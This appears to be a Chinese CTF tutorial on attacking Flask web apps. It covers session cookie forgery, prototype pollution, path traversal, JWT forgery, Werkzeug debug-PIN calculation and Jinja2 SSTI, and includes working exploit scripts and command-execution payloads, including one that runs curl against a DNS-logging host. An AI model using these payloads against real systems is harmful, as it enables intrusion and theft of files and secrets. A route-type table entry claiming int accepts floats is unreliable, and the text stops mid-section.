介绍

Python-Flask简介

Flask是一个Web应用程序框架,使用Python编写。该软件由ArminRonacher开发,他领导着Pocco国际Python爱好者小组。该软件基于WerkzeugWSGI工具箱和Jinja2模板引擎.

Flask有许多扩展,例如ORM、窗体验证工具、文件上传、身份验证,

使用Flask可以快速地搭建一个WEB应用,Flask默认使用Jinja2作为模板,Flask会自动配置Jinja 模板而不需要其他配置

本文所有程序已打包:/static/post/CTF_Python_Flask/ext/ext.zip

一个简单的示例

基本的Flask Web应用

源码

Flask应用的默认端口是5000,可以使用port=指定端口

flask_basic.py

1
2
3
4
5
6
7
8
9
10
11
12
from flask import Flask

app = Flask(__name__)

@app.route('/')
def hello_world():
return 'Hello Flask!'

if __name__ == '__main__':
# 默认值:host=127.0.0.1, port=5000, debug=false
#使用port=指定端口:app.run(port=)
app.run()

访问

直接访问,可见

ss17001019887293

带获取GET请求参数功能的Flask Web应用

源码

flask_basic_get.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def hello_world():
try:
#GET传参时的参数为name
r = request.args.get('name')
return "Hello " + r
except:
pass

return "Hello"

if __name__ == '__main__':
app.run()

访问

get传参name=abc可见

image-20221005182745728

带获取POST请求参数功能的Flask Web应用

源码

flask_basic_post.py

1
2
3
4
5
6
7
8
9
10
11
12
from flask import Flask, request

app = Flask(__name__)

@app.route('/', methods=['POST'])
def hello_world():
r = request.form.get('name')
print(r)
return "Hello " + r

if __name__ == '__main__':
app.run()

访问

post传参name=a后可见

ss167204056593104

带session功能的Flask Web应用

源码

flask_basic_session.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import os
import re
import time
import subprocess
from flask import Flask, make_response, session

app = Flask(__name__)
app.config['SECRET_KEY'] = 'AAAAAAAAAA'

def response(content, status):
resp = make_response(content, status)
return resp


@app.route('/', methods=['GET'])
def main():
if not session.get('user'):
session['user'] = 'Guest'
try:
user = session.get('user')
return 'Hello ' + user
except:
return response("Not Found.", 404)


if __name__ == '__main__':
app.run()

访问

可以看到成功获取了session中user的值

ss18430702336424

Flask的session的内容放在客户端中的cookie

ss1847013186112106

CTF中的Flask应用

SESSION相关

获取SESSION中保存的重要信息

flask中session是保存在客户机上的,并且只需进行简单的base64解码操作即可读取session的内容

flask在生成session时会使用app.config[‘SECRET_KEY’]中的值作salt对session进行签名

也就是说,flask保证session不被随意篡改,但不保证session的内容不随意泄露

可以使用以下程序获取session内容

源码

flask_session_decode.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)

decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True

try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')

if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')

return session_json_serializer.loads(payload)

if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))

例如有session如下

1
eyJ1cGRpciI6ImZpbGVpbmZvLy4uIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ.Y0Fj2g.UXNKMoSXrDAqOt90FWrOtZa9iNI

解码命令

1
python flask_session_decode.py session内容

ss17891224554347

SESSION伪造

未知secret_key

读取内存获取secret key

此部分详见本文Cat cat部分

  1. 通过任意文件读取直接读取app.py,适用于secret_key直接写在 (app.py路径可能在/proc/self/cmdline查看当前进程的命令中可以获取)
  2. 通过任意文件读取先通过/proc/self/maps读取堆栈分布, 再通过/proc/self/mem读取内存分布来获取

读到secret_key后进入下面的已知secret_key伪造部分

已知secret_key伪造

伪造的SESSION可以达到修改信息的目的(因为flask的session存放在客户端)

使用以下程序可以伪造session

flask_session_cookie_manager3.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
from abc import ABCMeta, abstractmethod
else: # > 3.4
from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

def __init__(self, secret_key):
self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
class FSCM(metaclass=ABCMeta):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)

session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)

return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e


def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value

if payload.startswith('.'):
compressed = True
payload = payload[1:]

data = payload.split(".")[0]

data = base64_decode(data)
if compressed:
data = zlib.decompress(data)

return data
else:
app = MockApp(secret_key)

si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)

return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
else: # > 3.4
class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)

session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)

return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e


def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value

if payload.startswith('.'):
compressed = True
payload = payload[1:]

data = payload.split(".")[0]

data = base64_decode(data)
if compressed:
data = zlib.decompress(data)

return data
else:
app = MockApp(secret_key)

si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)

return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e


if __name__ == "__main__":
# Args are only relevant for __main__ usage

## Description for help
parser = argparse.ArgumentParser(
description='Flask Session Cookie Decoder/Encoder',
epilog="Author : Wilson Sumanang, Alexandre ZANNI")

## prepare sub commands
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

## create the parser for the encode command
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
help='Session cookie structure', required=True)

## create the parser for the decode command
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
help='Session cookie value', required=True)

## get args
args = parser.parse_args()

## find the option chosen
if(args.subcommand == 'encode'):
if(args.secret_key is not None and args.cookie_structure is not None):
print(FSCM.encode(args.secret_key, args.cookie_structure))
elif(args.subcommand == 'decode'):
if(args.secret_key is not None and args.cookie_value is not None):
print(FSCM.decode(args.cookie_value,args.secret_key))
elif(args.cookie_value is not None):
print(FSCM.decode(args.cookie_value))

encode.py

1
2
3
4
5
6
7
8
9
10
from flask_session_cookie_manager3 import FSCM


secret_key = "engine-1"
data = '{"updir":"fileinfo/..","user":"Administrator"}'


d = FSCM.encode(secret_key, data)

print(d)

命令行使用

注意需要python3

1
python flask_session_cookie_manager3.py encode -s "secret的值" -t "内容"

以调用包的形式

将flask_session_cookie_manager3.py和encode.py放在同一个目录

然后运行encode.py,结果就是伪造的session

ss17290505699475

装饰器

Python 装饰器顺序错误导致的未授权访问

RealWorld CTF 2018 bookhub

源码如下,可以看到函数有两个装饰器,

一个是用于检查是否已经登录的装饰器login_required,另一个是flask的路由的装饰器,用于刷新session

如下代码这样子是存在问题的

1
2
3
4
@login_required
@user_blueprint.route('/admin/system/refresh_session/', methods=['POST'])
def refresh_session():
anyCode

Python中,装饰器的执行顺序是从靠近函数的装饰器开始的

当我们需要先验证有没有登录,再验证用户权限时,应该像下面这样写

1
2
3
4
@login_required
@permision_allowed
def f()
anyCode

下面这个是对上面提及的存在问题的代码的实际顺序解释,这样导致的结果就是鉴权失败

1
2
3
4
5
6
# 这里没有装饰器
def refresh_session():
pass

route_wrapped = app.route('/admin/refresh_session/')(refresh_session) # route 装饰器
login_wrapped = login_required(route_wrapped) # login 装饰器

引用自http://blog.evalbug.com/2018/08/07/flask_decorator_sequence/

所以正确写法应当如下代码所示

1
2
3
4
@user_blueprint.route('/admin/system/refresh_session/', methods=['POST'])
@login_required
def refresh_session():
anyCode

任意文件读取

Python原型链污染导致的任意文件读取

DASCTF-2023-7月赛-ezflask

先来看源码(以下代码可以直接运行,前提是装好flask)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import uuid

from flask import Flask, request, session

import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())
black_list = ["__init__"]
def check(data):
for i in black_list:
if i in data:
return False
return True

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False

Users = []

@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"

@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

if __name__ == "__main__":
app.run(host="0.0.0.0", port=5010)

简单看一遍源码,容易发现以下部分比较特殊

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

再配合上这个user类,非常容易想到原型链污染

详情建议看看这篇文章,解释的非常清楚:https://tttang.com/archive/1876/

1
2
3
4
5
6
7
8
9
class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False

仔细阅读代码,可以发现有一个读文件的地方

所以我们可以对魔术变量__file__进行污染

1
2
3
@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

如果对flask这个框架的配置有所了解的话,还可以选择static_folder这个全局变量进行污染

1
"_static_folder":"/"

因为flask可以通过static_folder配置用于放置css、js等静态文件的目录,

设置后即可直接通过url访问文件,例如访问http://[server]/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
def __init__(
self,
import_name,
static_url_path=None,
static_folder='static',
static_host=None,
host_matching=False,
subdomain_matching=False,
template_folder='templates',
instance_path=None,
instance_relative_config=False,
root_path=None
):

根据上面链接的文章描述,容易构造出以下payload

1
2
3
4
5
6
7
{
"__init__" : {
"__globals__" : {
"__file__":"/etc/passwd"
}
}
}

再来看下如何进行原型链污染

容易发现它取了post的内容,经过check函数后进行json反序列化,最后再merge生成user对象

也就是说我们直接post json即可

1
2
3
4
5
6
7
8
9
10
11
12
@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)

只需要构造以下内容

1
2
3
4
5
6
7
8
9
{
"username":"a",
"password":"b",
"__init__" : {
"__globals__" : {
"__file__":"/etc/passwd"
}
}
}

那么问题来了,__init__被check函数过滤了,要怎么办呢?

这里给出两种解法:

第一种是利用Python json库的解析特性和python字符串判断的差异,使用Unicode绕过

1
2
3
4
5
6
7
{
"__init\u005f_" : {
"__globals__" : {
"__file__":"/etc/passwd"
}
}
}

(想理解下边这个解法的话可以看看上面链接的文章,讲的非常好)

1
2
3
4
5
6
7
{
"check" : {
"__globals__" : {
"__file__":"/etc/passwd"
}
}
}

后面的考点就是伪造pin码RCE了,这里就不多解释了,本文已有记载

配合目录穿越

2022网鼎杯-web669

直接读取文件、参数可控且过滤不全

以下为部分关键代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#.............
# 其它部分已省略
@app.route('/<path:file>', methods=['GET'])
def download(file):
if session.get('updir'):
basedir = session.get('updir')
try:
path = os.path.join(basedir, file).replace('../', '')
if os.path.isfile(path):
return send_file(path)
else:
return response("Not Found.", 404)
except:
return response("Failed.", 500)

#.............
# 其它部分已省略

由于对../的处理只是简单使用replace方法进行替换置空,因此使用双写../(....//)即可进行绕过

1
path = os.path.join(basedir, file).replace('../', '')

然后接下来使用flask的send_file模块读取文件

1
2
if os.path.isfile(path):
return send_file(path)

实现了任意文件读取

使用open打开文件但未close

配合任意文件读取/proc/self/fd

2020网鼎杯白虎组Web-PicDown

app.py源码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
return render_template('search.html')


@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"

return res


if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
任意文件读取

任意文件读取由以下代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
代码审计

SECRET_KEY藏在/tmp/secret.txt,可是已经被删除了

但是可以发现没有使用f.close()关闭文件句柄

1
2
3
4
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

以下程序可以执行shell, 但是需要key,即前面提到的SECRET_KEY

1
2
3
4
5
6
7
8
9
10
11
12
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"

return res

已知使用open打开文件会创建文件描述符

即在/proc/self/fd中创建名为x的”文件”(x代表一个整数)(unix万物皆为文件的思想)

由于此次读取文件没有进行close操作,创建文件描述符的文件描述符还没有删除,

可以直接读取/proc/self/fd/x,x可以从1开始逐渐增加来穷举,读到的内容就是/tmp/secret.txt的内容

示例payload如下

1
/page?url=../../../../proc/self/fd/1

解释如下:

当程序打开一个文件, 会获得程序的文件描述符, 而此时如果文件被删除, 只会删除文件的目录项, 不会清空文件的内容, 原来的进程依然可以通过描述符对文件进行读取, 也就是说, 文件还存在内存里

文件上传(配合软链接)

2022美团杯-OnlineUnzip

题目允许用户上传zip文件

以下代码是服务端使用unzip命令解压用户上传的zip文件的实现

unzip命令默认禁止了zip slip,即虽然zip文件可以打包包含../路径的文件,但unzip命令解压时会忽略../(避免了任意写文件)

zip slip

通过目录遍历文件名(例如../../evil.sh)的精心构建的存档文件攻击者可以通过Zip Slip 漏洞把恶意文件复制到操作系统中(超出应用本身的控制范围之外)。Zip Slip漏洞可影响多种存档格式,包括zip、tar、jar、war、cpio、apk、rar和7z。

1
2
3
4
5
6
7
8
9
10
11
#.............
# 其它部分已省略
def extractFile(filepath):
extractdir=filepath.split('.')[0]
if not os.path.exists(extractdir):
os.makedirs(extractdir)
os.system(f'unzip -o {filepath} -d {extractdir}')
return redirect(url_for('display',extractdir=extractdir))

#.............
# 其它部分已省略

解压的文件由以下代码实现文件列表展示(使用os.listdir进行目录读取,使用open进行文件读取)

不允许出现..,避免了目录穿越

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
@app.route('/display', methods=['GET'])
@app.route('/display/', methods=['GET'])
@app.route('/display/<path:extractdir>', methods=['GET'])
def display(extractdir=''):
if re.search(r"\.\.", extractdir, re.M | re.I) != None:
return "Hacker?"
else:
if not os.path.exists(extractdir):
return make_response("error", 404)
else:
if not os.path.isdir(extractdir):
f = open(extractdir, 'rb')
response = make_response(f.read())
response.headers['Content-Type'] = 'application/octet-stream'
return response
else:
fn = os.listdir(extractdir)
fn = [".."] + fn
f = open("templates/template.html")
x = f.read()
f.close()
ret = "<h1>文件列表:</h1><br><hr>"
for i in fn:
tpath = os.path.join('/display', extractdir, i)
ret += "<a href='" + tpath + "'>" + i + "</a><br>"
x = x.replace("HTMLTEXT", ret)
return x

创建一个根目录的软连接

1
ln -s / root_dir

然后进行zip压缩(-y参数用于保持软连接)

1
zip -r myzip.zip root_dir -y

ss18430702848089

zip内容如下

ss178606077164111

上传之后即可遍历根目录,并读取文件

如何避免目录穿越

避免用户直接控制读取文件的参数从而能够读取磁盘上的任意文件

使用静态资源

所有静态资源可以被访问者直接获取

默认位置

FLASK APP运行目录下的static文件夹为静态目录

1
2
3
4
5
6
from flask import Flask

# 创建flask的应用对象
# __name__表示当前的模块名称
# 模块名: flask以这个模块所在的目录为根目录,默认这个目录中的static为静态目录,templates为模板目录
app = Flask(__name__)
设置静态目录
1
2
3
4
5
6
>from flask import Flask

app = Flask(import_name=__name__,
static_url_path='/static', # 配置静态文件的访问 url 前缀
static_folder='static' # 配置静态文件的文件夹
)

引用自https://blog.51cto.com/u_11239407/5437426

使用Flask的动态路由

(URL路径参数)

参数类型说明

动态路由的参数类型默认是 string,但是也可以指定其他类型,比如数字 int 等

类型 说明
string 默认,可以不用写
int 同 int,但是仅接受浮点数
float 同 int,但是仅接受浮点数
path 和 string 相似,但接受斜线

引用自https://blog.51cto.com/u_12020737/3090824

注意:使用string类型的路径参数仍然存在目录穿越的可能

示例

用户通过访问/file/id读取信息

通过open直接打开文件

1
2
3
4
5
6
7
8
9
10
11
@app.route('/file/<int:id>')
def user_info(id):
try:
path = f'static/{id}.json'
if os.path.isfile(path):
with open(path, 'rb') as file:
return file.read()
except:
return 'Err', 500

return '404 Not Found', 404

通过flask的sendfile模块

1
2
3
4
5
6
7
8
9
10
11
12
from flask import send_file

@app.route('/file/<int:id>')
def user_info(id):
try:
path = f'static/{id}.json'
if os.path.isfile(path):
return send_file(path)
except:
return 'Err', 500

return '404 Not Found', 404

JWT相关

通过JWT库的漏洞

python-jwt这个库在版本< 3.3.4存在漏洞

详情可以查看此处:https://github.com/davedoesdev/python-jwt/security/advisories/GHSA-5p8v-58qm-c7fp

JWT伪造

摘录自测试用例https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import json
from jwcrypto.common import base64url_decode, base64url_encode

def topic(topic):
[header, payload, signature] = topic.split('.')
parsed_payload = json.loads(base64url_decode(payload))
parsed_payload['sub'] = 'bob'
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'


jwt = "xxxx.xxx.xxx"
print(topic(jwt))

2022祥云杯 FunWEB

此题需要使key'is_admin' 的value为1来获取graphql 查询权限

伪造jwt的EXP如下(注意token每过一段时间会过期,需要重新生成)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from datetime import timedelta
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode

def topic(topic):
""" Use mix of JSON and compact format to insert forged claims including long expiration """
[header, payload, signature] = topic.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['is_admin'] = 1
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
token = topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')

print(token)

此exp原文链接:https://blog.csdn.net/m0_64910183/article/details/127661200

RCE(远程代码/命令执行)

通过代码中存在的漏洞

一个简单的计算表达式的服务,使用了eval函数

get传参eval即可代码执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def hello_world():
try:

r = request.args.get('eval')
return f"Result:{eval(r)}"
except Exception as e:
print(e)
pass

return "Hello"

if __name__ == '__main__':
app.run()

传参如下实现无回显命令执行(相当于执行os.system(),执行curl y3j4ey.dnslog.cn

1
__import__('os').system('curl y3j4ey.dnslog.cn')

ss16560312799964

DNSLog显示有请求

ss187201218984112

通过伪造debug pin码(需要读取主机上几个文件)

(前提是开启调试模式)

ss18430704421921

示例程序

flask_basic_get_debug_pin.py

由于没有处理r为None的情况,就把None Type的r直接与字符串”Hello “拼接导致出错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def hello_world():
r = request.args.get('name')
if r != '':
return "Hello " + r

else:
return "Hello"

if __name__ == '__main__':
app.run(debug=True)

报错界面

ss18141218343357

点击右边小图标可进入调试模式

ss18210322110140104

要求输入pin码

ss16241224978891

可以以交互模式执行python程序

ss16930831101151141

需要

获取启动Flask应用的用户名(可以读取/etc/passwd获取)(获取username)

一般默认:flask.app(获取modname)

flask目录下的一个app.py的绝对路径(可以通过报错页面看到)(获取app.py的绝对路径)(类似:/usr/local/lib/python3.5/site-packages/flask/app.py)

ss178606047699104

以及读取以下几个文件

  • /sys/class/net/eth0/address(可能不是eth0,可能是ensxx)(获取网卡地址)

  • /proc/self/cgroup、/etc/machine-id、/proc/sys/kernel/random/boot_id(获取machine_id)

坑点:有的版本的flask只要读到三个文件中任意一个文件即可,

​ 有的版本从/etc/machine-id、/proc/sys/kernel/random/boot_id中任意一个文件读到值后就和/proc/self/cgroup中的id值拼接)

pin码生成程序如下(适用于新版的flask)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import hashlib
from itertools import chain
probably_public_bits = [
'root',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
'2485377892354',# str(uuid.getnode()), /sys/class/net/ens33/address
'32e48d371198e8420c53b0a1fa37e94d'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num

print(rv)

新旧版本flask debug pin码生成可以参考:https://blog.csdn.net/qq_42303523/article/details/124232532

区别是旧版计算摘要信息(digest)用的是md5,新版计算摘要信息用的是sha1

通过Debug模式热加载

flask开启debug模式时,当文件被修改(包括被import的py文件被修改),就会重启整个flask服务,相当于重新执行这个py文件

CISCN 2023 go_session

前面的go部分存在ssti(使用pongo2作为模板引擎)

184307079210185

可以传入参数name,利用c这个对象里面的方法

如下就是上传一个文件的payload

1
{%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form)%}{{c.SaveUploadedFile(file,path)}}&m=xxx&n=xx

然后将保存地址设为app.py,覆盖原来的py程序,即可完成利用

SSTI(模板注入)

在实例化Flask APP对象时可以设置模板存放位置,然后flask渲染模板时会在此位置下找

1
2
app = Flask(import_name=__name__,
template_folder='templates') # 配置模板文件的文件夹

Flask默认使用Jinja 2作为模板引擎

Jinja的语法有以下几种:

1
2
3
4
5
6
7
{%....%}语句(Statements)

{f .…H}打印模板输出的表达式(Expressions)

{#....#}注释

#...##行语句(Line Statements)

一个基本的flask模板使用

在字符串中使用模板

可以直接在字符串中使用{{` `}}{% ` `%}等来制作模板

flask_basic_render.py

1
2
3
4
5
6
7
8
9
10
11
from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/')
def hello_world():
n = "aaa"
return render_template_string("Hello {{name}}", name=n)

if __name__ == '__main__':
app.run()

效果如下

ss183704038411778

在模板文件中

可以写在文件,比如index.html

然后将index.html放在templates文件夹中(默认模板文件夹是templates)

1
2
3
4
<html>
<title>Title</title>
<p>{{content}}</p>
</html>

渲染模板

flask_basic_ren_html.py

1
2
3
4
5
6
7
8
9
10
11
from flask import Flask, render_template

app = Flask(__name__)

@app.route('/')
def hello_world():
c = "Hello"
return render_template("index.html", content=c)

if __name__ == '__main__':
app.run()

效果如下

ss1786060578104100

可以发现{{content}}已经被渲染了

ss175711189913496

一个基本的ssti漏洞

flask_basic_get_ssti.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from flask import Flask, render_template_string, request

app = Flask(__name__)

@app.route('/')
def hello_world():
name='guest'

r = request.args.get('name')
if r != '' and r != None:
name = r
return render_template_string("Hello %s" % name)

if __name__ == '__main__':
app.run()

代码执行

执行os.popen

1
{{().__class__.__bases__[0].__subclasses__()[140].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
1
{%print(lipsum.__globals__['__geti''tem__']('o''s')['pop''en']('cat /f*').read())%}
1
{%print(lipsum|attr("__globals__"))|attr("__getitem__")("os")|attr("popen")("whoami")|attr("read")()%}

过滤单双引号

1
{{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag

过滤中括号和单双引号

1
{{url_for.__globals__.os.popen(request.cookies.cmd).read()}}

过滤下划线

1
{{(lipsum|attr(request.values.b)).os.popen(request.values.a).read()}}&a=cat%20/flag&b=__globals__

过滤os

1
